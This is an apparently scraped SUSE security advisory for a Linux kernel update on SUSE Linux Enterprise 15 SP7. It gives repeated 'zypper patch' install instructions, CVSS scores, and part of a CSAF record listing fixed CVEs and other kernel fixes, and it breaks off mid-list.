To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThe SUSE Linux Enterprise 15 SP7 kernel was updated to fix various security issues\n\nThe following security issues were fixed:\n\n- CVE-2023-54013: interconnect: Fix locking for runpm vs reclaim (bsc#1256280).\n- CVE-2025-39880: libceph: fix invalid accesses to ceph_connection_v1_info (bsc#1250388).\n- CVE-2025-40238: net/mlx5: Fix IPsec cleanup over MPV device (bsc#1254871).\n- CVE-2025-40254: net: openvswitch: remove never-working support for setting nsh fields (bsc#1254852).\n- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).\n- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).\n- CVE-2025-40261: nvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).\n- CVE-2025-40264: be2net: pass wrb_params in case of OS2BMC (bsc#1254835).\n- CVE-2025-40328: smb: client: fix potential UAF in smb2_close_cached_fid() (bsc#1254624).\n- CVE-2025-40350: net/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ (bsc#1255260).\n- CVE-2025-40355: sysfs: check visibility before changing group attribute ownership (bsc#1255261).\n- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).\n- CVE-2025-68171: x86/fpu: Ensure XFD state on signal delivery (bsc#1255255).\n- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).\n- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).\n- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).\n- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).\n- CVE-2025-68215: ice: fix PTP cleanup on driver removal in error path (bsc#1255226).\n- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).\n- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).\n- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).\n- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255377).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255401).\n- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).\n- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).\n- CVE-2025-68301: net: atlantic: fix fragment overflow handling in RX path (bsc#1255120).\n- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).\n- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).\n- CVE-2025-68327: usb: renesas_usbhs: Fix synchronous external abort on unbind (bsc#1255488).\n- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).\n- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).\n- CVE-2025-68363: bpf: Check skb-\u003etransport_header is set in bpf_skb_check_mtu (bsc#1255552).\n- CVE-2025-68365: fs/ntfs3: Initialize allocated memory before use (bsc#1255548).\n- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).\n- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).\n- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).\n- CVE-2025-68379: RDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure (bsc#1255695).\n- CVE-2025-68727: ntfs3: Fix uninit buffer allocated by __getname() (bsc#1255568).\n- CVE-2025-68728: ntfs3: fix uninit memory after failed mi_read in mi_format_new (bsc#1255539).\n- CVE-2025-68733: smack: fix bug: unprivileged task can create labels (bsc#1255615).\n- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).\n- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).\n- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).\n- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).\n- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).\n- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).\n- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).\n- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).\n- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).\n- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).\n- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).\n- CVE-2025-68803: nfsd: set security label during create operations (bsc#1256770).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).\n- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).\n- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).\n- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).\n- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).\n- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).\n- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).\n- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).\n- CVE-2025-71080: ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT (bsc#1256608).\n- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).\n- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).\n- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).\n- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).\n- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).\n- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).\n- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).\n- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).\n- CVE-2025-71096: RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly (bsc#1256606).\n- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).\n- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).\n- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).\n- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).\n- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).\n- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).\n- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).\n- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).\n- CVE-2025-71137: octeontx2-pf: fix \u0027UBSAN: shift-out-of-bounds error\u0027 (bsc#1256760).\n- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).\n- CVE-2025-71156: gve: defer interrupt enabling until NAPI registration (bsc#1257167).\n- CVE-2025-71157: RDMA/core: always drop device refcount in ib_del_sub_device_and_put() (bsc#1257168).\n- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).\n- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).\n- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).\n- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).\n- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).\n- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).\n- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).\n- CVE-2026-22996: net/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv.\n- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).\n- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).\n- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).\n- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).\n- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).\n\nThe following non security issues were fixed:\n\n- ALSA: ctxfi: Fix potential OOB access in audio mixer handling (stable-fixes).\n- ALSA: scarlett2: Fix buffer overflow in config retrieval (git-fixes).\n- ALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free() (git-fixes).\n- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).\n- ALSA: usb: Increase volume range that triggers a warning (git-fixes).\n- ASoC: amd: yc: Add quirk for Honor MagicBook X16 2025 (stable-fixes).\n- ASoC: codecs: wsa881x: Drop unused version readout (stable-fixes).\n- ASoC: codecs: wsa881x: fix unnecessary initialisation (git-fixes).\n- ASoC: codecs: wsa883x: fix unnecessary initialisation (git-fixes).\n- ASoC: codecs: wsa884x: fix codec initialisation (git-fixes).\n- ASoC: fsl_sai: Add missing registers to cache default (stable-fixes).\n- ASoC: fsl: imx-card: Do not force slot width to sample width (git-fixes).\n- ASoC: Intel: sof_es8336: fix headphone GPIO logic inversion (git-fixes).\n- ASoC: tlv320adcx140: fix null pointer (git-fixes).\n- ASoC: tlv320adcx140: fix word length (git-fixes).\n- ata: libata: Add cpr_log to ata_dev_print_features() early return (git-fixes).\n- Bluetooth: hci_uart: fix null-ptr-deref in hci_uart_write_work (git-fixes).\n- Bluetooth: MGMT: Fix memory leak in set_ssp_complete (git-fixes).\n- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).\n- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).\n- bs-upload-kernel: Fix cve branch uploads.\n- btrfs: do not strictly require dirty metadata threshold for metadata writepages (stable-fixes).\n- can: ctucanfd: fix SSP_SRC in cases when bit-rate is higher than 1 MBit (git-fixes).\n- can: ems_usb: ems_usb_read_bulk_callback(): fix URB memory leak (git-fixes).\n- can: etas_es58x: allow partial RX URB allocation to succeed (git-fixes).\n- can: gs_usb: gs_usb_receive_bulk_callback(): fix error message (git-fixes).\n- can: gs_usb: gs_usb_receive_bulk_callback(): unanchor URL on usb_submit_urb() error (git-fixes).\n- can: j1939: make j1939_session_activate() fail if device is no longer registered (stable-fixes).\n- can: kvaser_usb: kvaser_usb_read_bulk_callback(): fix URB memory leak (git-fixes).\n- can: mcba_usb: mcba_usb_read_bulk_callback(): fix URB memory leak (git-fixes).\n- can: usb_8dev: usb_8dev_read_bulk_callback(): fix URB memory leak (git-fixes).\n- cifs: add new field to track the last access time of cfid (git-fixes).\n- cifs: after disabling multichannel, mark tcon for reconnect (git-fixes).\n- cifs: avoid redundant calls to disable multichannel (git-fixes).\n- cifs: cifs_pick_channel should try selecting active channels (git-fixes).\n- cifs: deal with the channel loading lag while picking channels (git-fixes).\n- cifs: dns resolution is needed only for primary channel (git-fixes).\n- cifs: do not disable interface polling on failure (git-fixes).\n- cifs: do not search for channel if server is terminating (git-fixes).\n- cifs: fix a pending undercount of srv_count (git-fixes).\n- cifs: Fix copy offload to flush destination region (bsc#1252511).\n- cifs: Fix flushing, invalidation and file size with copy_file_range() (bsc#1252511).\n- cifs: fix lock ordering while disabling multichannel (git-fixes).\n- cifs: fix stray unlock in cifs_chan_skip_or_disable (git-fixes).\n- cifs: fix use after free for iface while disabling secondary channels (git-fixes).\n- cifs: handle servers that still advertise multichannel after disabling (git-fixes).\n- cifs: handle when server starts supporting multichannel (git-fixes).\n- cifs: handle when server stops supporting multichannel (git-fixes).\n- cifs: make cifs_chan_update_iface() a void function (git-fixes).\n- cifs: make sure server interfaces are requested only for SMB3+ (git-fixes).\n- cifs: make sure that channel scaling is done only once (git-fixes).\n- cifs: reconnect worker should take reference on server struct unconditionally (git-fixes).\n- cifs: reset connections for all channels when reconnect requested (git-fixes).\n- cifs: reset iface weights when we cannot find a candidate (git-fixes).\n- cifs: serialize other channels when query server interfaces is pending (git-fixes).\n- cifs: update dstaddr whenever channel iface is updated (git-fixes).\n- comedi: dmm32at: serialize use of paged registers (git-fixes).\n- comedi: fix divide-by-zero in comedi_buf_munge() (stable-fixes).\n- comedi: Fix getting range information for subdevices 16 to 255 (git-fixes).\n- cpuset: fix warning when disabling remote partition (bsc#1256794).\n- crypto: authencesn - reject too-short AAD (assoclen\u003c8) to match ESP/ESN spec (git-fixes).\n- dmaengine: apple-admac: Add \u0027apple,t8103-admac\u0027 compatible (git-fixes).\n- dmaengine: at_hdmac: fix device leak on of_dma_xlate() (git-fixes).\n- dmaengine: bcm-sba-raid: fix device leak on probe (git-fixes).\n- dmaengine: dw: dmamux: fix OF node leak on route allocation failure (git-fixes).\n- dmaengine: idxd: fix device leaks on compat bind and unbind (git-fixes).\n- dmaengine: lpc18xx-dmamux: fix device leak on route allocation (git-fixes).\n- dmaengine: omap-dma: fix dma_pool resource leak in error paths (git-fixes).\n- dmaengine: qcom: gpi: Fix memory leak in gpi_peripheral_config() (git-fixes).\n- dmaengine: sh: rz-dmac: Fix rz_dmac_terminate_all() (git-fixes).\n- dmaengine: tegra-adma: Fix use-after-free (git-fixes).\n- dmaengine: ti: dma-crossbar: fix device leak on am335x route allocation (git-fixes).\n- dmaengine: ti: dma-crossbar: fix device leak on dra7x route allocation (git-fixes).\n- dmaengine: ti: k3-udma: fix device leak on udma lookup (git-fixes).\n- dmaengine: xilinx_dma: Fix uninitialized addr_width when \u0027xlnx,addrwidth\u0027 property is missing (git-fixes).\n- dmaengine: xilinx: xdma: Fix regmap max_register (git-fixes).\n- dpll: fix device-id-get and pin-id-get to return errors properly (git-fixes).\n- dpll: fix return value check for kmemdup (git-fixes).\n- dpll: indent DPLL option type by a tab (git-fixes).\n- dpll: Prevent duplicate registrations (git-fixes).\n- dpll: spec: add missing module-name and clock-id to pin-get reply (git-fixes).\n- drm/amd: Clean up kfd node on surprise disconnect (stable-fixes).\n- drm/amd/display: Apply e4479aecf658 to dml (stable-fixes).\n- drm/amd/display: Bump the HDMI clock to 340MHz (stable-fixes).\n- drm/amd/display: Fix DP no audio issue (stable-fixes).\n- drm/amd/display: Initialise backlight level values from hw (git-fixes).\n- drm/amd/display: Respect user\u0027s CONFIG_FRAME_WARN more for dml files (stable-fixes).\n- drm/amd/display: shrink struct members (stable-fixes).\n- drm/amd/pm: Don\u0027t clear SI SMC table when setting power limit (git-fixes).\n- drm/amd/pm: fix race in power state check before mutex lock (git-fixes).\n- drm/amd/pm: fix smu overdrive data type wrong issue on smu 14.0.2 (git-fixes).\n- drm/amd/pm: Workaround SI powertune issue on Radeon 430 (v2) (git-fixes).\n- drm/amdgpu: 